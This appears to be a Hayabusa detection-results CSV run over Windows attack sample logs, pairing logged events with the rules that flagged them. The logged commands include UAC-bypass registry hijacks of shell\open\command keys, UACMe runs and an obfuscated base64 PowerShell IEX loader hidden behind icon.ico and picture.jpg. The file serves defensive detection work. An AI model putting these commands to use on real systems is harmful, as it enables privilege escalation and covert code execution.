2019-08-04 16:26:34.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 330 000002806444C490  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  45 c:\Windows\SysWOW64\notepad.exe  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe""   :  Path: C:\Windows\System32\changepk.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey  :  Path: C:\Windows\System32\SystemSettingsAdminFlows.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  53  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe""   :  Path: C:\Windows\System32\sdclt.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe""   :  Path: C:\Windows\System32\sdclt.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe""  /name Microsoft.BackupAndRestoreCenter  :  Path: C:\Windows\System32\control.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\control.exe""  /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  55 c:\Windows\SysWOW64\notepad.exe  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe  :  Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  55 c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5  :  Path: C:\Windows\System32\msconfig.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5  :  Path: C:\Windows\System32\msconfig.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  56  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe""   :  Path: C:\Windows\System32\WSReset.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe""   :  Path: C:\Windows\System32\WSReset.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser  :  Workstation: -  :  IP Address: ::1  :  Port: 0  :  LogonID: 0x38f87e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""""""  :  Path: C:\Windows\System32\wscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""""""  :  Path: C:\Windows\System32\wscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
